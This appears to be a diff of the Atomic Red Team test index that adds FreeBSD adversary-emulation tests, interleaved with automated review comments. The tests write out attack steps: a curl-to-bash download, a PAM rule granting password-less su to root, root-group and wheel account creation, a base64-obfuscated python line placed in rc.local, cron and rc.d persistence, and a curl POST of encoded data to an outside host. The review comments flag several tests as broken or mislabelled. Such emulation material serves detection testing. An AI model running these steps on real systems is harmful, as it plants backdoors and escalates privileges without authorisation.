elevation_required: false
|
||||
command: |
|
||||
export ART='echo "Atomic Red Team was here... T1059.004"'
|
||||
echo $ART |/bin/sh
|
||||
cleanup_command: 'unset ART
|
||||
|
||||
'
|
||||
- name: Detecting pipe-to-shell
|
||||
auto_generated_guid: fca246a8-a585-4f28-a2df-6495973976a1
|
||||
@@ -33387,6 +34667,42 @@ execution:
|
||||
cleanup_command: 'rm /tmp/art.txt
|
||||
|
||||
'
|
||||
- name: Detecting pipe-to-shell (freebsd)
|
||||
auto_generated_guid: 1a06b1ec-0cca-49db-a222-3ebb6ef25632
|
||||
description: 'An adversary may develop a useful utility or subvert the CI/CD
|
||||
pipe line of a legitimate utility developer, who requires or suggests installing
|
||||
their utility by piping a curl download directly into bash. Of-course this
|
||||
is a very bad idea. The adversary may also take advantage of this BLIND install
|
||||
method and selectively running extra commands in the install script for those
|
||||
who DO pipe to bash and not for those who DO NOT. This test uses curl to download
|
||||
the pipe-to-shell.sh script, the first time without piping it to bash and
|
||||
the second piping it into bash which executes the echo command.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
remote_url:
|
||||
description: url of remote payload
|
||||
type: url
|
||||
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if running on a Debian based machine.
|
||||
|
||||
'
|
||||
prereq_command: |
|
||||
if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi
|
||||
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
|
||||
get_prereq_command: 'pkg update && pkg install -y curl
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
|
||||
|bash\nls -la /tmp/art.txt \n"
|
||||
cleanup_command: "rm /tmp/art.txt \n"
|
||||
- name: Current kernel information enumeration
|
||||
auto_generated_guid: 3a53734a-9e26-4f4b-ad15-059e767f5f14
|
||||
description: 'An adversary may want to enumerate the kernel information to tailor
|
||||
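Review bot: in "Detecting pipe-to-shell (freebsd)" the dependency `description` reads "Check if running on a Debian based machine." while `prereq_command` greps `/etc/os-release` for `FreeBSD`; fix the text. More importantly, the executor pipes the download into `bash` (`curl -s #{remote_url} |bash`) but the only dependency checked and installed is `curl`; bash is a package on FreeBSD, so on a base install the second `curl` invocation fails with "bash: not found" and `/tmp/art.txt` is never created. Either pipe to `sh` (the executor already is `sh`) or add the `bash` prerequisite and `pkg install -y bash` step used by the Trap entries in this patch.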
@@ -33830,7 +35146,6 @@ execution:
|
||||
description: Download and execute shell script and write to file then execute
|
||||
locally using Python -c (command mode)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
script_url:
|
||||
@@ -33872,7 +35187,6 @@ execution:
|
||||
description: Create Python file (.py) that downloads and executes shell script
|
||||
via executor arguments
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
python_script_name:
|
||||
@@ -33930,7 +35244,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
python_script_name:
|
||||
@@ -33995,7 +35308,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependencies:
|
||||
- description: 'Verify if python is in the environment variable path and attempt
|
||||
@@ -34845,6 +36157,39 @@ execution:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: 'echo "#{at_command}" | at #{time_spec}'
|
||||
- name: At - Schedule a job freebsd
|
||||
auto_generated_guid: 549863fb-1c91-467e-97fc-1fa32b9f356b
|
||||
description: 'This test submits a command to be run in the future by the `at`
|
||||
daemon.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
time_spec:
|
||||
description: Time specification of when the command should run
|
||||
type: string
|
||||
default: now + 1 minute
|
||||
at_command:
|
||||
description: The command to be run
|
||||
type: string
|
||||
default: echo Hello from Atomic Red Team
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'The `at` executable must exist in the PATH
|
||||
|
||||
'
|
||||
prereq_command: 'which at
|
||||
|
||||
'
|
||||
get_prereq_command: 'echo ''Please install `at` ; they were not found in the
|
||||
PATH (Package name: `at`)''
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: 'echo "#{at_command}" | at #{time_spec}'
|
||||
T1035:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -35613,6 +36958,36 @@ persistence:
|
||||
'
|
||||
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
|
||||
|
||||
'
|
||||
- name: Malicious PAM rule (freebsd)
|
||||
auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3
|
||||
description: |
|
||||
Inserts a rule into a PAM config and then tests it.
|
||||
|
||||
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_pam_conf:
|
||||
description: PAM config file to modify.
|
||||
type: string
|
||||
default: "/etc/pam.d/su"
|
||||
pam_rule:
|
||||
description: Rule to add to the PAM config.
|
||||
type: string
|
||||
default: auth sufficient pam_succeed_if.so uid >= 0
|
||||
index:
|
||||
description: Index where the rule is inserted.
|
||||
type: integer
|
||||
default: 8
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
|
||||
|
||||
'
|
||||
cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}
|
||||
|
||||
'
|
||||
- name: Malicious PAM module
|
||||
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
|
||||
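Review bot: the default `pam_rule` in "Malicious PAM rule (freebsd)" references `pam_succeed_if.so`, which is a Linux-PAM module; FreeBSD's OpenPAM does not ship it, so the inserted line points at a module that cannot be loaded and `su` will fail rather than behave as the description promises ("allows every user to su to root without a password"). The default should reference a module that exists in OpenPAM and the expected outcome should be re-verified on a FreeBSD host. Also worth verifying there: the `sed -i "" "#{index}s,^,#{pam_rule}\n,g"` replacement relies on `\n` being expanded to a newline, which GNU sed does but BSD sed historically does not, so the rule may be glued onto the front of line 8 instead of inserted as its own line; the `i` command, or a backslash followed by a literal newline, is the portable form.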
@@ -37154,9 +38529,8 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -37207,6 +38581,33 @@ persistence:
|
||||
rm /etc/cron.hourly/#{cron_script_name}
|
||||
rm /etc/cron.monthly/#{cron_script_name}
|
||||
rm /etc/cron.weekly/#{cron_script_name}
|
||||
- name: Cron - Add script to /etc/cron.d folder
|
||||
auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846'
|
||||
description: 'This test adds a script to /etc/cron.d folder configured to execute
|
||||
on a schedule.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
type: string
|
||||
default: echo '*/5 * * * * root echo "Hello
|
||||
from Atomic Red Team"' > /tmp/atomic.log
|
||||
cron_script_name:
|
||||
description: Name of file to store in cron folder
|
||||
type: string
|
||||
default: persistevil
|
||||
executor:
|
||||
elevation_required: true
|
||||
name: sh
|
||||
command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name}
|
||||
|
||||
'
|
||||
cleanup_command: 'rm /etc/cron.d/#{cron_script_name}
|
||||
|
||||
'
|
||||
- name: Cron - Add script to /var/spool/cron/crontabs/ folder
|
||||
auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
|
||||
description: 'This test adds a script to a /var/spool/cron/crontabs folder configured
|
||||
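Review bot: third copy of the "/etc/cron.d" entry with the same broken default `command` and double-quote interpolation noted under `privilege-escalation` and `execution`; no separate fix needed here once the shared definition is corrected.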
@@ -38232,7 +39633,6 @@ persistence:
|
||||
description: Turn on Chrome/Chromium developer mode and Load Extension found
|
||||
in the src directory
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -38250,7 +39650,6 @@ persistence:
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
description: Install the "Minimum Viable Malicious Extension" Chrome extension
supported_platforms:
- freebsd
- linux
- windows
- macos
@@ -38267,7 +39666,6 @@ persistence:

'
supported_platforms:
- freebsd
- linux
- windows
- macos
@@ -40047,6 +41445,32 @@ persistence:
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
EXIT''

'
cleanup_command: 'rm -f /tmp/art-fish.txt

'
name: sh
- name: Trap EXIT (freebsd)
auto_generated_guid: be1a5d70-6865-44aa-ab50-42244c9fd16f
description: |
Launch bash shell with command arg to create TRAP on EXIT.
The trap executes script that writes to /tmp/art-fish.txt
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if bash is installed.

'
prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit
0; fi;

'
get_prereq_command: "(which pkg && pkg install -y bash)\n"
executor:
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
EXIT''

'
cleanup_command: 'rm -f /tmp/art-fish.txt

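Review bot: supported_platforms says `- linux` for a test named `Trap EXIT (freebsd)` whose get_prereq_command is `(which pkg && pkg install -y bash)`; on a Linux host that prereq can never be satisfied, and on FreeBSD the platform filter will never offer the test. Apart from that one prereq line the block duplicates the Linux test directly above it (same command, same cleanup, same description), so either tag it freebsd or explain in the description why a second copy is needed.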
@@ -40064,6 +41488,32 @@ persistence:
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
SIGINT && kill -SIGINT $$''

'
cleanup_command: 'rm -f /tmp/art-fish.txt

'
name: sh
- name: Trap SIGINT (freebsd)
auto_generated_guid: ade10242-1eac-43df-8412-be0d4c704ada
description: |
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
The trap executes script that writes to /tmp/art-fish.txt
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if bash is installed.

'
prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit
0; fi;

'
get_prereq_command: "(which pkg && pkg install -y bash)\n"
executor:
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
SIGINT && kill -SIGINT $$''

'
cleanup_command: 'rm -f /tmp/art-fish.txt

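Review bot: same `- linux` tag on a `(freebsd)` test whose only FreeBSD-specific line is the `pkg install -y bash` prereq; the executor and cleanup are identical to the Trap SIGINT test above it, so the same fix applies.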
@@ -40348,6 +41798,27 @@ persistence:
'
name: bash
elevation_required: true
- name: Create a user account on a FreeBSD system
auto_generated_guid: a39ee1bc-b8c1-4331-8e5f-1859eb408518
description: 'Create a user via pw

'
supported_platforms:
- linux
input_arguments:
username:
description: Username of the user to create
type: string
default: evil_user
executor:
command: 'pw useradd #{username} -s /usr/sbin/nologin -d /nonexistent -c evil_account

'
cleanup_command: 'rmuser -y #{username}

'
name: sh
elevation_required: true
- name: Create a new user in Linux with `root` UID and GID.
auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c
description: 'Creates a new user in Linux and adds the user to the `root` group.
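Review bot: `pw useradd` and `rmuser` exist only on FreeBSD, yet supported_platforms is `- linux`, so the test is offered exactly where neither command is present and the executor fails with "command not found"; tag it freebsd, and since the test declares no dependencies, add a prereq_command such as `command -v pw` so a missing tool is reported before the executor runs rather than after.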
@@ -40374,6 +41845,32 @@ persistence:
'
name: bash
elevation_required: true
- name: Create a new user in FreeBSD with `root` GID.
auto_generated_guid: d141afeb-d2bc-4934-8dd5-b7dba0f9f67a
description: 'Creates a new user in FreeBSD and adds the user to the `root`
group. This technique was used by adversaries during the Butter attack campaign.

'
supported_platforms:
- linux
input_arguments:
username:
description: Username of the user to create
type: string
default: butter
password:
description: Password of the user to create
type: string
default: BetterWithButter
executor:
command: |
pw useradd #{username} -g 0 -d /root -s /bin/sh
echo "#{password}" | pw usermod #{username} -h 0
cleanup_command: 'pw userdel #{username}

'
name: sh
elevation_required: true
T1053.001:
technique:
x_mitre_platforms:
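Review bot: the title and description say the user is added to the `root` group, but on FreeBSD GID 0 is `wheel` (the base /etc/group has no `root` group), so `-g 0` should be described as wheel/GID 0 to avoid a detection engineer looking for the wrong group name. `-d /root` makes the new account share root's home directory; cleanup `pw userdel #{username}` deliberately leaves it alone, which is correct, but worth a comment. This test also uses `pw userdel` where the FreeBSD test just above uses `rmuser -y`; pick one form for consistency.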
@@ -41065,9 +42562,8 @@ persistence:
persistence on victim host. \nIf the user is able to save the same contents
in the authorized_keys file, it shows user can modify the file.\n"
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
name: sh
elevation_required: false
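Review bot: same doubled `- macos` around `- linux` as in the earlier -9/+8 supported_platforms hunk; check that the merged list for this authorized_keys test does not end up with macos listed twice.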
@@ -44848,6 +46344,26 @@ persistence:
head -n '-2' ~/.bashrc > /tmp/T1546.004
mv /tmp/T1546.004 ~/.bashrc
name: sh
- name: Add command to .shrc
auto_generated_guid: 41502021-591a-4649-8b6e-83c9192aff53
description: 'Adds a command to the .shrc file of the current user

'
supported_platforms:
- linux
input_arguments:
command_to_add:
description: Command to add to the .shrc file
type: string
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
executor:
command: 'echo ''#{command_to_add}'' >> ~/.shrc

'
cleanup_command: |
head -n '-2' ~/.shrc > /tmp/T1546.004
mv /tmp/T1546.004 ~/.shrc
name: sh
- name: Append to the system shell profile
auto_generated_guid: 694b3cc8-6a78-4d35-9e74-0123d009e94b
description: 'An adversary may wish to establish persistence by executing malicious
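Review bot: the cleanup_command relies on `head -n '-2'`, a GNU coreutils extension (negative line counts); BSD head(1) on FreeBSD, the system that actually uses ~/.shrc, rejects it with "illegal line count", so the appended command is left in place after the test, and where GNU head is available it strips two lines although the executor appended only one. Remove exactly what was added instead, e.g. delete the last line with `sed -i '' '$d' ~/.shrc` on FreeBSD, or filter out the literal `#{command_to_add}` line.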
@@ -44855,7 +46371,6 @@ persistence:

'
supported_platforms:
- freebsd
- linux
input_arguments:
text_to_append:
@@ -44878,7 +46393,6 @@ persistence:

'
supported_platforms:
- freebsd
- linux
input_arguments:
text_to_append:
@@ -46615,6 +48129,27 @@ persistence:
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
sudo rm $origfilename;fi

'
- name: rc.local (FreeBSD)
auto_generated_guid: 2015fb48-8ab6-4fbf-928b-0b62de5c9476
description: 'Modify rc.local

'
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: |
filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
printf '%s\n' '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local
echo 'python3.9 -c "import os, base64;exec(base64.b64decode(\"aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo=\"))"' | sudo tee -a /etc/rc.local
printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
sudo chmod +x /etc/rc.local
cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
sudo rm $origfilename;fi

'
T1209:
technique:
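Review bot: `printf '%s\n' '#\!/usr/local/bin/bash'` writes the backslash literally (it is inside single quotes, where `\!` has no meaning), so the first line of /etc/rc.local becomes `#\!/usr/local/bin/bash`, which is not a shebang; drop the backslash. The payload line also hardcodes `python3.9` and the shebang hardcodes `/usr/local/bin/bash`, and neither is checked by a prereq, so add a dependency on the interpreter (or use `/bin/sh` and `python3`) so the test reports a missing tool instead of writing a broken rc.local. These are FreeBSD paths; supported_platforms should say freebsd, not linux.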
@@ -46932,6 +48467,45 @@ persistence:
rm -rf #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
name: bash
- name: Create SysV Service
auto_generated_guid: 760fe8d2-79d9-494f-905e-a239a3df86f6
description: 'This test creates a SysV service unit file and enables it as a
service.

'
supported_platforms:
- linux
input_arguments:
rc_service_path:
description: Path to rc service file
type: path
default: "/usr/local/etc/rc.d"
rc_service_file:
description: File name of rc service file
type: string
default: art-test
executor:
command: "echo '#\\!/bin/sh' > #{rc_service_path}/#{rc_service_file}\necho
' ' >> #{rc_service_path}/#{rc_service_file}\necho '#' >> #{rc_service_path}/#{rc_service_file}\necho
'# PROVIDE: art-test' >> #{rc_service_path}/#{rc_service_file}\necho '#
REQUIRE: LOGIN' >> #{rc_service_path}/#{rc_service_file}\necho '# KEYWORD:
shutdown' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho
'. /etc/rc.subr' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho
'name=\"art_test\"' >> #{rc_service_path}/#{rc_service_file}\necho 'rcvar=art_test_enable'
>> #{rc_service_path}/#{rc_service_file}\necho 'load_rc_config ${name}'
>> #{rc_service_path}/#{rc_service_file}\necho 'command=\"/usr/bin/touch\"'
>> #{rc_service_path}/#{rc_service_file}\necho 'start_cmd=\"art_test_start\"'
>> #{rc_service_path}/#{rc_service_file}\necho '' >> #{rc_service_path}/#{rc_service_file}\necho
'art_test_start()' >> #{rc_service_path}/#{rc_service_file} \necho '{'
>> #{rc_service_path}/#{rc_service_file}\necho ' ${command} /tmp/art-test.marker'
>> #{rc_service_path}/#{rc_service_file}\necho '}' >> #{rc_service_path}/#{rc_service_file}\necho
' ' >> #{rc_service_path}/#{rc_service_file} \necho 'run_rc_command
\"$1\"' >> #{rc_service_path}/#{rc_service_file}\nchmod +x #{rc_service_path}/#{rc_service_file}\nservice
art-test enable\nservice art-test start\n"
cleanup_command: |
sysrc -x art_test_enable
rm -f #{rc_service_path}/#{rc_service_file}
name: sh
- name: Create Systemd Service file, Enable the service , Modify and Reload the
service.
auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
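Review bot: the name `Create SysV Service` and the description "creates a SysV service unit file" do not match what the executor writes, which is a FreeBSD rc.d script (`. /etc/rc.subr`, `rcvar=art_test_enable`, `run_rc_command "$1"`, `service art-test enable`) under /usr/local/etc/rc.d; rename it along the lines of "Create rc.d Service (FreeBSD)" and tag supported_platforms freebsd so detection content is mapped to the right init system. The first line written is `#\!/bin/sh` (the backslash survives the single quotes, as in the rc.local test), so the script has no valid shebang. The start function touches /tmp/art-test.marker, but cleanup_command removes only the rc.conf variable and the script; remove the marker too.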
@@ -47852,6 +49426,39 @@ persistence:
name: sh
elevation_required: false
command: 'echo "#{at_command}" | at #{time_spec}'
- name: At - Schedule a job freebsd
auto_generated_guid: 549863fb-1c91-467e-97fc-1fa32b9f356b
description: 'This test submits a command to be run in the future by the `at`
daemon.

'
supported_platforms:
- linux
input_arguments:
time_spec:
description: Time specification of when the command should run
type: string
default: now + 1 minute
at_command:
description: The command to be run
type: string
default: echo Hello from Atomic Red Team
dependency_executor_name: sh
dependencies:
- description: 'The `at` executable must exist in the PATH

'
prereq_command: 'which at

'
get_prereq_command: 'echo ''Please install `at` ; they were not found in the
PATH (Package name: `at`)''

'
executor:
name: sh
elevation_required: false
command: 'echo "#{at_command}" | at #{time_spec}'
T1556:
technique:
modified: '2023-04-11T03:17:32.211Z'
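Review bot: apart from the name, this block is a verbatim copy of the Linux `at` test directly above it (same description, same input defaults, same prereq, same executor), so as merged it only adds a second entry with the same behaviour and the same `- linux` tag; if a FreeBSD entry is wanted, make the difference real (tag it freebsd and state the FreeBSD-specific requirement in the dependency) and fix the prereq message grammar ("it was not found", `at` being one executable).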
@@ -48314,6 +49921,23 @@ persistence:
whoami
exit
cleanup_command: "userdel -r art \n"
- name: Create local account (FreeBSD)
auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
description: 'An adversary may wish to create an account with admin privileges
to work with. In this test we create a "art" user with the password art, switch
to art, execute whoami, exit and delete the art user.

'
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
| pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n"
cleanup_command: 'rmuser -y art

'
- name: Reactivate a locked/expired account (Linux)
auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931
description: "A system administrator may have locked and expired a user account
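Review bot: `pw mod user testuser1 -h 0` sets the password on an account called `testuser1`, not on the `art` account created on the previous line, so `su art` then prompts for a password that was never set. Separately, `pw -h 0` reads a cleartext password from fd 0 and hashes it itself, so piping in `openssl passwd -1 art` would store the MD5 hash string as the literal password even with the right user; either pipe the cleartext (`echo art | pw usermod art -h 0`) or supply the hash with `-H 0`.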
@@ -48337,6 +49961,30 @@ persistence:
whoami
exit
cleanup_command: "userdel -r art \n"
- name: Reactivate a locked/expired account (FreeBSD)
auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf'
description: "A system administrator may have locked and expired a user account
rather than deleting it. \"the user is coming back, at some stage\" An adversary
may reactivate a inactive account in an attempt to appear legitimate. \n\nIn
this test we create a \"art\" user with the password art, lock and expire
the account, try to su to art and fail, unlock and renew the account, su successfully,
then delete the account.\n"
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: |
pw useradd art -g wheel -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
pw lock art
pw usermod art -e +1d
pw unlock art
pw user mod art -e +99d
su art
whoami
exit
cleanup_command: "rmuser -y art \n"
- name: Login as nobody (Linux)
auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85
description: 'An adversary may try to re-purpose a system account to appear
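Review bot: the same `testuser1` / hashed-input-to-`-h 0` mistake as in the Create local account (FreeBSD) test is on line 2 of this executor. The description promises a failed `su` while the account is locked and expired, but the command locks, sets `-e +1d` (an expiry one day in the future, which does not expire anything), and unlocks without ever attempting `su` in the locked state; either add the failing `su art` step with an expiry in the past, or cut the description down to what actually runs. `pw usermod art -e +1d` and `pw user mod art -e +99d` are two spellings of the same command; use one.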
@@ -48355,6 +50003,26 @@ persistence:
nobody\nsu nobody\nwhoami\nexit\n"
cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep
nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
- name: Login as nobody (freebsd)
auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310
description: 'An adversary may try to re-purpose a system account to appear
legitimate. In this test change the login shell of the nobody account, change
its password to nobody, su to nobody, exit, then reset nobody''s shell to
/usr/sbin/nologin.

'
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged
user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho
$(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n"
cleanup_command: |
pw usermod nobody -s /usr/sbin/nologin
cat /etc/passwd |grep nobody
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
T1574.012:
technique:
x_mitre_platforms:
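Review bot: the description says the password is changed to `nobody`, but the executor pipes `openssl passwd -1 art` into `pw mod user nobody -h 0` (and, as in the other FreeBSD account tests, `-h 0` expects cleartext rather than a hash), so the description, the password and the flag disagree; align all three. The `# -> nobody:x:65534...` comment in the executor shows the Linux shadow marker `x`, while the cleanup comment correctly shows FreeBSD's `*`; fix the first so the expected output matches what the preceding `grep` prints. Cleanup also resets only the shell and leaves the password that was set on `nobody`; restore the locked password too.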
@@ -48588,6 +50256,37 @@ command-and-control:
echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}
name: sh
- name: Base64 Encoded data (freebsd)
auto_generated_guid: 2d97c626-7652-449e-a986-b02d9051c298
description: 'Utilizing a common technique for posting base64 encoded data.

'
supported_platforms:
- linux
input_arguments:
destination_url:
description: Destination URL to post encoded data.
type: url
default: redcanary.com
base64_data:
description: Encoded data to post using fake Social Security number 111-11-1111.
type: string
default: MTExLTExLTExMTE=
dependency_executor_name: sh
dependencies:
- description: 'Requires curl

'
prereq_command: "if [ -x \"$(command -v curl)\" ]; then exit 0; else exit
1; fi; \n"
get_prereq_command: 'pkg install -y curl

'
executor:
command: |
echo -n 111-11-1111 | b64encode -r -
curl -XPOST #{base64_data}.#{destination_url}
name: sh
T1568.002:
technique:
x_mitre_platforms:
@@ -50100,6 +51799,33 @@ command-and-control:
'
name: sh
elevation_required: true
- name: Tor Proxy Usage - FreeBSD
auto_generated_guid: 550ec67d-a99e-408b-816a-689271b27d2a
description: "This test is designed to launch the tor proxy service, which is
what is utilized in the background by the Tor Browser and other applications
with add-ons in order to provide onion routing functionality.\nUpon successful
execution, the tor proxy service will be launched. \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: "Tor must be installed on the machine \n"
prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else
exit 1; fi

'
get_prereq_command: 'pkg install -y tor

'
executor:
command: |
sysrc tor_enable="YES"
service tor start
cleanup_command: |
service tor stop
sysrc -x tor_enable
name: sh
elevation_required: true
T1001:
technique:
x_mitre_platforms:
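Review bot: in the prereq_command, `command -v tor --version` passes `--version` as a second name for `command -v` to look up rather than as an argument to tor; it happens to work only because the `-x` test sees the path of the first name, so simplify to `command -v tor`. The `sysrc tor_enable="YES"` / `service tor start` pair with the matching `service tor stop` / `sysrc -x tor_enable` cleanup is tidy, but both `sysrc` and `service` are FreeBSD-specific, so supported_platforms should say freebsd rather than linux.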
@@ -50213,7 +51939,6 @@ command-and-control:

'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -50794,7 +52519,6 @@ command-and-control:
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -50883,7 +52607,6 @@ command-and-control:

'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -50923,7 +52646,6 @@ command-and-control:

'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -50962,7 +52684,6 @@ command-and-control:

'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -50993,7 +52714,6 @@ command-and-control:

'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -51024,7 +52744,6 @@ command-and-control:

'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -51055,7 +52774,6 @@ command-and-control:

'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -51086,7 +52804,6 @@ command-and-control:

'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -51301,9 +53018,8 @@ command-and-control:

Note that this test may conflict with pre-existing system configuration.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
proxy_server:
description: Proxy server URL (host:port)
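Review bot: doubled `- macos` again in a -9/+8 supported_platforms hunk; verify the merged list for this proxy test has macos once.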
@@ -51633,7 +53349,6 @@ collection:

'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -51663,7 +53378,6 @@ collection:

'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -51700,9 +53414,8 @@ collection:

'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
test_folder:
description: Path used to store files.
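Review bot: same doubled `- macos` pattern (-9/+8) as the other reordered supported_platforms hunks; check the merged list for this test_folder test.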
@@ -51873,6 +53586,36 @@ collection:

'
name: bash
- name: X Windows Capture (freebsd)
auto_generated_guid: 562f3bc2-74e8-46c5-95c7-0e01f9ccc65c
description: 'Use xwd command to collect a full desktop screenshot and review
file with xwud

'
supported_platforms:
- linux
input_arguments:
output_file:
description: Output file path
type: path
default: "/tmp/T1113_desktop.xwd"
dependency_executor_name: sh
dependencies:
- description: 'Package with XWD and XWUD must exist on device

'
prereq_command: |
if [ -x "$(command -v xwd)" ]; then exit 0; else exit 1; fi
if [ -x "$(command -v xwud)" ]; then exit 0; else exit 1; fi
get_prereq_command: "pkg install -y xwd xwud \n"
executor:
command: |
xwd -root -out #{output_file}
xwud -in #{output_file}
cleanup_command: 'rm #{output_file}

'
name: sh
- name: Capture Linux Desktop using Import Tool
auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
description: 'Use import command from ImageMagick to collect a full desktop
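Review bot: the first line of prereq_command exits 0 as soon as `xwd` is found, so the `xwud` check on the second line never executes and a host with xwd but not xwud passes the prereq and then fails in the executor; combine the two tests in one condition, e.g. `if [ -x "$(command -v xwd)" ] && [ -x "$(command -v xwud)" ]; then exit 0; else exit 1; fi`. The `pkg install` prereq and the `(freebsd)` name again sit under `- linux`.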
@@ -51905,6 +53648,38 @@ collection:

'
name: bash
- name: Capture Linux Desktop using Import Tool (freebsd)
